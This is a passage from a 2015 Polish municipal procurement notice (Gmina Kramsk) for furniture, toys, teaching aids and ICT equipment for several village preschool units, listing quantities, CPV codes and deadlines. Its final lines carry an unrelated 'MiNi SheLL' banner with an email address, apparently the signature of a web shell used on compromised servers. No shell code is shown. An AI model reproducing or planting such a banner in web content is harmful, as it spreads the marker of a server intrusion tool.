<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych. 2. Zmiana postanowień niniejszej umowy w zakresie odnoszącym się do ceny, terminu i sposobu realizacji jest dopuszczalna w przypadku: zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami lub obowiązującymi przepisami prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminakramsk.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kramsk, ul. Chopina 12, 62-511 Kramsk, pokój nr 24, inspektor Anna Kasprzak..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2015 godzina 08:00, miejsce: Urząd Gminy w Kramsku, ul. Chopina 12, 62-511 Kramsk SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie jest współfinansowane ze środków Unii Europejskiej w ramach programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż mebli i wyposażenia  do Oddziałów Przedszkolnych przy Szkołach Podstawowych w Woli Podłężnej, Anielewie, Kramsku i Wysokiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej:
(dostawa i montaż: odkurzacz 1 sztuka, froterka 1 sztuka, lodówka 1 sztuka, stoły przedszkolne 5 sztuk, krzesełka dziecięce 20 sztuk, szafka zamykana 3 sztuki, szafka ze schowkami 3 sztuki, regał na zabawki 3 sztuki, wykładzina dywanowa 20 m2, rolety okienne 1 komplet, szafka na ubrania 3 sztuki)
b)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie: 
(dostawa i montaż: odkurzacz 1 sztuka, froterka 1 sztuka, wózek sprzątający z mopem 1 sztuka, lodówka 1 sztuka, umywalka do mycia rąk z baterią 1 sztuka, stoły przedszkolne 8 sztuk, krzesełka dziecięce 16 sztuk, regał z 2 szafkami 3 sztuki, regał 2 sztuki, biurko dla nauczyciela 1 sztuka, krzesło wysokie 1 sztuka, szafka 2 sztuki, biblioteczka 1 sztuka, szafka na ubrania 3 sztuki, rolety okienne 3 komplety, wykładzina dywanowa 22,50 m2). 
c)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, wózek do sprzątania 1 sztuka, mop do sprzątania 2 sztuki, garnki i naczynia 3 komplety, stoły przedszkolne 6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, krzesło wysokie 1 sztuka, biblioteczka 1 sztuka, regał  z kieszeniami 3 sztuki, szafka na ubrania 3 sztuki).   
d)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, mop do sprzątania 2 sztuki, stoły przedszkolne   6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, krzesło wysokie  1 sztuka, biblioteczka 1 sztuka, regał z kieszeniami 3 sztuki, szafka na ubrania 3 sztuki). 
e)	Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, mop do sprzątania 2 sztuki, stoły przedszkolne  6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, biblioteczka 1 sztuka, regał z kieszeniami 3 sztuki, krzesło wysokie 1 sztuka, szafka na ubrania 3 sztuki). 
f)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: odkurzacz 1 sztuka, karcher 1 sztuka, stoły przedszkolne 4 sztuki, krzesełka dziecięca 25 sztuk, szafka 3 sztuki, rolety okienne 4 sztuki, wykładzina dywanowa 22 m2).
g)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: odkurzacz 1 sztuka, stoły przedszkolne 4 sztuki, krzesełka dziecięce 25 sztuk, froterka 1 sztuka, szafka  3 sztuki, rolety okienne 4 sztuki, wykładzina dywanowa 25 m2.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa pomocy dydaktycznych i wyposażenia wypoczynkowego do Oddziałów Przedszkolnych przy szkołach Podstawowych w Woli Podłężnej, Anielewie, Kramsku i Wysokiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej
(dostawa: komplet zabawek 47 zestawów, artykuły plastyczne 70 zestawów, materac do leżenia 12 sztuk, gruszka mała 2 sztuki, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet)
b)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie:
(dostawa: komplet zabawek 60 zestawów, artykuły plastyczne 75 zestawów, materac do leżenia 7 sztuk, pomoce dydaktyczne 16 sztuk, pufy 2 zestawy, siedziska poduszki 11 sztuk, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet).
c)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem: 
(dostawa: komplet zabawek 96 kompletów, artykuły plastyczne 75 kompletów, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet).
d)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa: komplet zabawek 95 zestawów, artykuły plastyczne 104 komplety, materac do leżakowania 12 sztuk, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa mały miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
e)	Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa: komplet zabawek 69 zestawów, artykuły plastyczne 99 zestawów, materac do leżakowania 13 sztuk, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa śpiący miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
f)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa: komplet zabawek 87 zestawów, artykuły plastyczne 100 zestawów, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa śpiący miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
g)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa: komplet zabawek 88 zestawów, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa śpiący mis 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i wyposażenie w sprzęt ICT, audiowizualny i tablice interaktywne  Oddziałów Przedszkolnych przy Szkołach Podstawowych w Woli Podłężnej, Anielewie, Kramsku i Wysokiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej:
dostawa i montaż: komputer wraz z oprogramowaniem 1 zestaw, monitor 1 sztuka, telewizor 1 sztuka, drukarka 1 sztuka, skaner 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka, kserokopiarka 1 sztuka). 
b)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie:
(dostawa i montaż: laptop z oprogramowaniem 1 sztuka, DVD 1 sztuka, drukarka 1 sztuka, kamera i aparat HD 1 zestaw, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem   1 sztuka, kserokopiarka 1 sztuka).
c)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 2 sztuki, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem  1 sztuka, kserokopiarka 1 sztuka).
d)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka). 
e)	Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 1 sztuka, aparat cyfrowy 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka). 
f)	Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: kamera HD 1 sztuka, DVD 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka, kserokopiarka 1 sztuka.) 
g)	Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: aparat fotograficzny 1 sztuka, DVD 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6, 30.00.00.00-9, 48.00.00.00-8, 30.21.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com